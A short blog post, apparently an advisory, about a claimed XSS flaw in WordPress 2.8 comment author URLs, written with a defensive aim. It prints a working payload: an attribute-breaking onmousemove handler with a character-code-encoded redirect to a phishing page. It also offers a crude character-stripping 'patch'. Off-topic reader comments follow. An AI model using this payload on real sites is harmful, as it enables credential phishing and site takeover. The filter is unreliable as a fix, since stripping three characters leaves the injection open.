Be Careful,Wordpress 2.8 All Version Xss 0DAY
It had been published that wordpress 2.8 All version are suffering from Xss,attackers can use this to do phishing,they make a wordpress login page as it is your own.If you don’t take care,your password will be sent to the attacker’s website.With your password,they can edit pages and upload webshell.It is harmful.
How is the attacker do this?
they insert website url like this(in the comments write place):
1 | http://www.vul.kr' onmousemove='location.href=String.fromCharCode(104,116,116,112,58,47,47,119,119,119,46,118,117,108,46,107,114,47,63,112,61,53,54,57); |
If someone(or administrator) moved his mouse on the author’s website.It will jump to another URL,which is a phishing page.
How can we patch it?
Edit wp-comments-post.php
go line 40 and then add:
1 2 3 | $comment_author_url = str_replace(chr(39),'',$comment_author_url); $comment_author_url = str_replace(chr(59),'',$comment_author_url); $comment_author_url = str_replace(chr(44),'',$comment_author_url); |
Webmasters,please patch it as soon as you can.
Hi, I can’t understand how to add your site in my rss reader. Can you Help me, please
Hi,my rss is here http://feeds.feedburner.com/http/wwwvulkr/feedrss2
If you have gmail account,click it and the login to account,you can add it.
I like your style, the fact that your site is a little bit different makes it so interesting, I get fed up of seeing same-old-same-old all of the time. I’ve just stumbled this page for you
This has been really interesting, thanks for that. I love this blog theme too!